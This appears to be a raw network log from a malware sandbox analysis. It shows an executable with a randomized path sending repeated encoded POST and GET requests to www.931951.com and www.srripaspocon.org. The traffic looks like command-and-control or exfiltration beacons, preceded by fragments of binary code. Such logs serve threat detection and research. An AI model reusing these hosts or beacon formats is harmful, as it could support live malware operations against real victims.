Jun 5, 2024 18:28:36.122927904 CEST	1236	IN	Data Raw: 08 e8 cd ff ff ff 50 e8 e7 32 00 00 f7 d8 1b c0 f7 d0 23 45 10 5d c2 0c 00 55 8b ec 56 8b 75 0c 80 3e 00 75 07 b8 eb 03 00 00 eb 2c 81 4d 10 20 00 10 00 8d 45 10 50 ff 75 08 e8 94 ff ff ff 50 e8 05 32 00 00 85 c0 74 0c ff 75 10 56 50 e8 0a 00 00 Data Ascii: P2#E]UVu>u,M EPuP2tuVPjX^]USVuWEPPuu:2uv0@uNuPuuhPjutu$@j6tjVuuu$@
Jun 5, 2024 18:28:36.122934103 CEST	1236	IN	Data Raw: 0f 8e 58 01 00 00 be 00 40 00 00 39 75 14 7d 03 8b 75 14 bf 28 d4 41 00 56 57 e8 49 01 00 00 85 c0 0f 84 2f 01 00 00 29 75 14 89 3d 60 b8 40 00 89 35 64 b8 40 00 8b 7d f4 8b 45 f8 68 60 b8 40 00 89 3d 68 b8 40 00 a3 6c b8 40 00 e8 d7 33 00 00 85 Data Ascii: X@9u}u(AVWI/)u=`@5d@}Eh`@=h@l@3E5h@+BtC+E=w}u3Eu+EjdPD@PEh @Pt@EPj}t5}uVuu*t/uh@u)uE}Kq}
Jun 5, 2024 18:28:36.122941971 CEST	636	IN	Data Raw: 42 00 ff e8 ac 02 00 00 89 44 24 18 e8 c9 01 00 00 ff 15 80 82 40 00 39 5c 24 10 5d 0f 84 1e 01 00 00 68 10 00 20 00 ff 74 24 10 e8 83 21 00 00 6a 02 ff 15 84 80 40 00 e8 e1 20 00 00 68 50 a1 40 00 56 8b f8 e8 69 2a 00 00 3b fb 74 0b 68 4c a1 40 Data Ascii: BD$@9\$]h t$!j@ hP@Vi;thL@VZhD@VO*\CUV@t;Vt { V@8TCuUhTC)t$hC)f@@3j%A@]0BfCB W)W(@9\$t?jWhlC
Jun 5, 2024 18:28:36.128164053 CEST	1236	IN	Data Raw: ff 85 c0 75 03 40 eb 2c 6a 0c 6a 40 ff 15 58 81 40 00 85 c0 74 1b 8b 4c 24 0c 89 70 08 89 48 04 8b 0d 34 98 42 00 89 08 a3 34 98 42 00 33 c0 eb 03 83 c8 ff 5e c2 08 00 83 ec 10 53 55 56 8b 35 14 f4 42 00 57 6a 02 e8 67 2b 00 00 33 db 3b c3 74 12 Data Ascii: u@,jj@X@tL$pH4B4B3^SUV5BWjg+3;tPh`C'TpBSWShD@h`C0`Cx`Cs&8pBuSWhb@h@hU&Wh`C'@BTC UBB!NH;tzVLX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49732	172.82.177.221	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:41.897675991 CEST	696	OUT	POST /2ha1/ HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.931951.com Referer: http://www.931951.com/2ha1/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 35 4c 78 34 46 4c 44 5a 39 58 2f 62 55 34 42 50 54 47 57 31 44 4d 71 54 35 6e 2b 4b 42 79 55 52 6a 6d 32 6d 63 52 4a 77 38 4f 4a 43 48 5a 33 67 33 79 62 54 4b 34 75 37 31 41 55 52 67 33 62 57 4b 6a 7a 54 47 71 56 66 4c 6b 4c 32 35 37 52 6a 76 6e 59 64 64 38 5a 66 59 5a 78 79 43 45 2b 32 65 43 46 70 68 6b 48 34 49 38 4a 4a 74 51 36 66 73 2b 77 77 61 44 68 53 51 65 7a 75 7a 33 4d 37 46 59 73 6a 78 57 6d 44 5a 74 4a 33 4d 54 41 6a 6b 4c 46 48 79 79 6c 76 54 4a 61 2b 5a 73 79 79 46 77 49 44 68 6a 63 61 4e 6d 57 6b 32 65 6f 31 57 54 6e 4b 45 63 4d 4f 46 2b 67 4d 6c 35 47 48 7a 77 68 52 2f 77 3d 3d Data Ascii: 9d=m4CeyHIdc3Vj5Lx4FLDZ9X/bU4BPTGW1DMqT5n+KByURjm2mcRJw8OJCHZ3g3ybTK4u71AURg3bWKjzTGqVfLkL257RjvnYdd8ZfYZxyCE+2eCFphkH4I8JJtQ6fs+wwaDhSQezuz3M7FYsjxWmDZtJ3MTAjkLFHyylvTJa+ZsyyFwIDhjcaNmWk2eo1WTnKEcMOF+gMl5GHzwhR/w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49733	172.82.177.221	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:44.430041075 CEST	716	OUT	POST /2ha1/ HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.931951.com Referer: http://www.931951.com/2ha1/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 34 71 42 34 4a 49 72 5a 34 33 2f 59 49 6f 42 50 63 6d 57 35 44 4d 6d 54 35 6d 37 48 43 41 77 52 67 43 36 6d 64 54 68 77 2f 4f 4a 43 4a 35 33 6c 34 53 62 61 4b 34 7a 59 31 41 59 52 67 33 50 57 4b 6d 33 54 46 64 35 59 4c 30 4c 34 73 72 52 6c 72 6e 59 64 64 38 5a 66 59 5a 6c 55 43 45 32 32 65 79 31 70 68 42 6e 2f 57 73 4a 47 71 51 36 66 6d 65 77 30 61 44 68 30 51 63 48 55 7a 31 30 37 46 5a 63 6a 79 48 6d 63 4b 4e 4a 78 42 7a 42 71 31 36 55 6c 33 68 70 38 65 66 54 68 57 75 54 52 4e 6d 56 68 37 42 51 32 54 33 75 66 79 63 4d 44 42 31 36 2f 47 64 49 57 49 63 55 74 36 4f 6a 74 2b 69 41 56 70 4e 51 41 32 5a 35 7a 4b 56 4c 33 39 55 58 71 6a 75 38 51 57 35 6f 3d Data Ascii: 9d=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCAwRgC6mdThw/OJCJ53l4SbaK4zY1AYRg3PWKm3TFd5YL0L4srRlrnYdd8ZfYZlUCE22ey1phBn/WsJGqQ6fmew0aDh0QcHUz107FZcjyHmcKNJxBzBq16Ul3hp8efThWuTRNmVh7BQ2T3ufycMDB16/GdIWIcUt6Ojt+iAVpNQA2Z5zKVL39UXqju8QW5o=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49734	172.82.177.221	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:46.992423058 CEST	1729	OUT	POST /2ha1/ HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.931951.com Referer: http://www.931951.com/2ha1/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 6d 34 43 65 79 48 49 64 63 33 56 6a 34 71 42 34 4a 49 72 5a 34 33 2f 59 49 6f 42 50 63 6d 57 35 44 4d 6d 54 35 6d 37 48 43 41 34 52 6a 78 79 6d 64 79 68 77 2b 4f 4a 43 42 5a 33 6b 34 53 61 49 4b 34 37 45 31 42 6b 72 67 30 33 57 4a 41 4c 54 45 70 74 59 46 30 4c 34 75 72 52 6b 76 6e 5a 66 64 38 4a 62 59 5a 31 55 43 45 32 32 65 77 74 70 6d 55 48 2f 55 73 4a 4a 74 51 36 4c 73 2b 77 63 61 44 4a 4b 51 63 54 45 77 42 49 37 46 35 4d 6a 7a 31 2b 63 4a 74 4a 7a 43 7a 42 79 31 36 59 54 33 6e 4e 4f 65 66 4f 4b 57 74 44 52 62 48 6b 75 71 41 77 5a 41 32 54 45 2f 66 38 2f 4b 46 36 6a 45 38 73 57 4a 2f 77 70 6e 63 66 79 6d 79 38 4c 70 59 74 61 30 50 46 52 4a 52 37 39 78 79 32 43 34 4d 63 75 4e 63 4b 4a 53 43 39 6c 77 68 30 7a 59 71 2f 45 78 2b 48 59 41 50 4e 78 75 37 56 67 6f 50 51 2f 63 67 59 66 44 6d 67 5a 4c 5a 6a 46 74 6b 79 68 57 48 78 48 48 66 47 2f 38 71 4e 33 4a 6e 69 7a 55 42 4c 2f 73 4d 4a 66 51 55 59 66 6c 37 7a 72 69 2b 6a 42 49 4a 54 7a 2b 51 64 71 52 49 2f 4a 74 47 7a 38 4f 79 6a 6f 77 48 58 [TRUNCATED] Data Ascii: 9d=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCA4Rjxymdyhw+OJCBZ3k4SaIK47E1Bkrg03WJALTEptYF0L4urRkvnZfd8JbYZ1UCE22ewtpmUH/UsJJtQ6Ls+wcaDJKQcTEwBI7F5Mjz1+cJtJzCzBy16YT3nNOefOKWtDRbHkuqAwZA2TE/f8/KF6jE8sWJ/wpncfymy8LpYta0PFRJR79xy2C4McuNcKJSC9lwh0zYq/Ex+HYAPNxu7VgoPQ/cgYfDmgZLZjFtkyhWHxHHfG/8qN3JnizUBL/sMJfQUYfl7zri+jBIJTz+QdqRI/JtGz8OyjowHX9WuLEJpV3DdximuWavdS2LwqDWxFuwqAH2zx2pO0AplDL1JJaJ9P+XRcVxq/tQGJSkTc0bzcKwTrhpEb9Nh7adz610N/G4cMC5tj5eAad3xN0ZBUE9BO7plawNA4Ws05veiLi1cjmNHoVrswsJQae6YfiywYC+WcPRcW6sMPsBUDFBnuMaU89uzc5nz90IP99GR60AsIC6E7xAzpZ6qi5T4XW7yq98xKmmtzzhWhqx3S3lRm9Js3v82r/THy04Gqs8SmDZ8bTu9OzmcmGOdGEEnuRHMKmkFPxtWlNPUJajF5NemLzDkjWVu6nL6AUc4JEBMmq9ftN15d080w5AVFAugS7MwLkeB2+4t+Cg6CgTOGvXH4e8UBO9mZ754EBwYCdUwyc6nVx7RUUvCJrE8MobhpRTraQbKi0w/Ov9FcXP9uI4558fPFVHoOJHBs9aUSvOEpm5oeVOeix8XqBFbaONLGn/LF68v38jrZvRGlAFBbFSxfg1Sbg5fJOshb7pk9knapgaRN2iDgEXEIYqhzSpWdNwLpLpI3prb1qqs1E8dl0cYTjkhx/UXLTwZiugKl5zoGqz0Me80e1NrMr0IcB9LSqJ8+/DvyYerAa3HaRvBaPLakAa9LCGLL7vb5qO/xhVQwvUhJQrBQ4PtdRWnJq30JsqdPt2hMJn [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49735	172.82.177.221	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:49.534404039 CEST	445	OUT	GET /2ha1/?G0a=VFN0vBc0ol1ljnb0&9d=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2LEX+h4RptWZDRuVlG4JzOnajShxrpz3BSvEogxiihZ9tHyNye+qQgWsY HTTP/1.1 Host: www.931951.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:28:50.189184904 CEST	917	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jun 2024 16:28:50 GMT Content-Type: text/html Content-Length: 781 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cf f3 c9 bd d7 d0 d0 c5 d7 b0 ca ce b2 c4 c1 cf b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 [TRUNCATED] Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49736	15.204.0.108	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:55.769731045 CEST	714	OUT	POST /egr4/ HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.srripaspocon.org Referer: http://www.srripaspocon.org/egr4/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 70 6e 38 54 51 6e 6c 52 42 47 51 78 79 37 65 32 78 51 54 49 64 74 6a 74 79 48 77 2f 39 59 46 72 58 78 36 5a 71 4a 72 71 4f 67 72 70 70 31 74 50 4e 35 4e 54 35 30 2f 4d 55 70 66 71 36 2f 50 39 6e 6d 53 56 49 4d 71 44 6c 42 76 4d 31 76 35 6f 2f 74 72 34 52 7a 71 56 6e 73 57 6a 58 30 4b 47 77 49 32 64 61 58 49 64 65 34 4a 51 5a 4e 4d 41 79 78 38 6c 2b 2f 56 47 77 34 75 42 58 33 44 31 78 63 31 31 41 6a 6d 67 32 38 38 41 33 64 76 4e 39 6d 49 71 43 54 45 30 69 77 69 36 33 73 51 52 44 58 6e 6d 68 46 41 31 44 38 42 4c 35 57 6e 50 6c 5a 6e 55 39 35 72 6c 54 54 55 33 45 75 45 30 39 48 4a 4e 77 77 3d 3d Data Ascii: 9d=DqO7igyO8zuopn8TQnlRBGQxy7e2xQTIdtjtyHw/9YFrXx6ZqJrqOgrpp1tPN5NT50/MUpfq6/P9nmSVIMqDlBvM1v5o/tr4RzqVnsWjX0KGwI2daXIde4JQZNMAyx8l+/VGw4uBX3D1xc11Ajmg288A3dvN9mIqCTE0iwi63sQRDXnmhFA1D8BL5WnPlZnU95rlTTU3EuE09HJNww==
Jun 5, 2024 18:28:56.462140083 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Wed, 05 Jun 2024 16:28:56 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 5, 2024 18:28:56.462156057 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49737	15.204.0.108	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:58.302217007 CEST	734	OUT	POST /egr4/ HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.srripaspocon.org Referer: http://www.srripaspocon.org/egr4/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 37 55 6b 54 57 77 4a 52 51 57 51 32 78 37 65 32 36 77 54 4d 64 74 2f 74 79 47 30 56 6f 37 74 72 58 55 57 5a 6b 6f 72 71 4e 67 72 70 6d 56 74 4b 56 5a 4e 61 35 30 79 73 55 70 7a 71 36 2f 62 39 6e 6b 4b 56 49 66 53 45 33 68 76 53 39 50 35 6d 78 4e 72 34 52 7a 71 56 6e 6f 33 30 58 77 75 47 77 37 75 64 56 54 55 61 41 6f 4a 54 50 39 4d 41 32 78 38 70 2b 2f 56 67 77 36 62 6d 58 31 37 31 78 5a 52 31 4f 53 6d 6a 6a 4d 38 61 7a 64 75 78 35 45 45 6d 46 69 31 4b 69 51 54 68 34 4c 45 6f 50 42 36 45 37 6e 4d 5a 64 74 35 77 39 55 44 35 79 2f 36 68 2f 34 76 39 65 78 67 57 62 5a 68 65 77 56 6f 4a 6d 4d 61 70 57 49 61 73 48 61 75 4e 64 6c 77 48 67 46 4d 73 4f 46 38 3d Data Ascii: 9d=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo7trXUWZkorqNgrpmVtKVZNa50ysUpzq6/b9nkKVIfSE3hvS9P5mxNr4RzqVno30XwuGw7udVTUaAoJTP9MA2x8p+/Vgw6bmX171xZR1OSmjjM8azdux5EEmFi1KiQTh4LEoPB6E7nMZdt5w9UD5y/6h/4v9exgWbZhewVoJmMapWIasHauNdlwHgFMsOF8=
Jun 5, 2024 18:28:59.200982094 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1236 Date: Wed, 05 Jun 2024 16:28:58 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 5, 2024 18:28:59.200992107 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
Jun 5, 2024 18:28:59.201189041 CEST	238	IN	Data Raw: 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49738	15.204.0.108	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:29:00.898577929 CEST	1747	OUT	POST /egr4/ HTTP/1.1 Host: www.srripaspocon.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Origin: http://www.srripaspocon.org Referer: http://www.srripaspocon.org/egr4/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 44 71 4f 37 69 67 79 4f 38 7a 75 6f 37 55 6b 54 57 77 4a 52 51 57 51 32 78 37 65 32 36 77 54 4d 64 74 2f 74 79 47 30 56 6f 39 31 72 55 69 43 5a 72 72 7a 71 4d 67 72 70 34 6c 74 4c 56 5a 4d 61 35 30 61 7a 55 70 50 36 36 39 6a 39 31 56 71 56 5a 65 53 45 39 68 76 53 78 76 35 6e 2f 74 71 69 52 79 61 52 6e 73 54 30 58 77 75 47 77 39 71 64 53 48 49 61 43 6f 4a 51 5a 4e 4d 48 79 78 39 38 2b 2f 4e 65 77 36 66 63 55 45 62 31 30 4a 42 31 4d 67 65 6a 68 73 38 45 30 64 75 70 35 45 4a 34 46 69 34 37 69 51 57 30 34 4d 6f 6f 4e 32 62 4f 76 6b 6f 41 46 4f 56 53 7a 6d 66 69 33 63 32 37 68 62 37 41 42 51 4d 57 66 37 51 6c 35 6c 5a 42 6b 37 2f 71 50 4c 75 52 48 6f 6d 35 62 56 42 71 6c 45 59 6b 55 6c 61 73 5a 4b 7a 64 51 7a 4e 32 42 6a 39 52 4e 78 39 5a 67 41 79 58 62 2f 5a 45 56 36 2f 6f 57 43 4a 31 70 31 5a 6c 47 37 61 77 7a 76 76 57 6b 36 53 6d 37 73 2b 65 4d 52 2b 44 51 76 71 4e 56 76 6f 64 4b 49 72 73 49 34 2b 46 61 34 72 63 51 4d 56 52 6b 6a 51 71 68 74 48 34 4b 64 35 2b 36 72 7a 55 31 42 35 71 55 5a 70 [TRUNCATED] Data Ascii: 